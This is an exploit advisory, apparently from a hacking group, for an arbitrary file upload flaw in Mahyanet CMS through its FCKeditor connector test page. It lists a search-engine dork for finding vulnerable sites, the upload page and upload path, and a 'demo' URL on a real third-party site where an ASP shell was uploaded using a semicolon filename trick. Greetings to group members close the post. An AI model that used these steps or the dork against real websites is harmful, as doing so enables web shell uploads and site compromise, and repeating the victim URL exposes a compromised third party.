@ Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- @ Name: Mahyanet Cms (FCKeditor) Arbitary File Upload Vulnerability @ Vendor: http://mahyanet.com @ Date: 2011-07-04 @ Author: Ashiyane Digital Security Team @ Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,Exploit-db.com @ Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com @ Home: www.ashiyane.org/forums/ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [+] Dork: intext:"Powered by : Mahyanet.com" -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [+] Vulnerabilities ~> [+] Vulnerability: http://127.0.0.1/Mahyanet/fckeditor/editor/filemanager/connectors/test.html [+] Uploaded Path: http://127.0.0.1/Mahyanet/fckeditor/editor/images/userfiles/file/[Your File] [+] Demo : http://www.tanhadairy.com/fckeditor/editor/images/userfiles/file/he.asp;(1)(1).txt -------------------------------------------------------------------------------- =========================================================================== @ Gr33tz: @ Ashiyane Members : @ BehroozIce,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04 @ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world @ Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk @ mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206 @ 1337 Member: @ r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger @ Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul, =========================================================================== <<./By XroGuE >>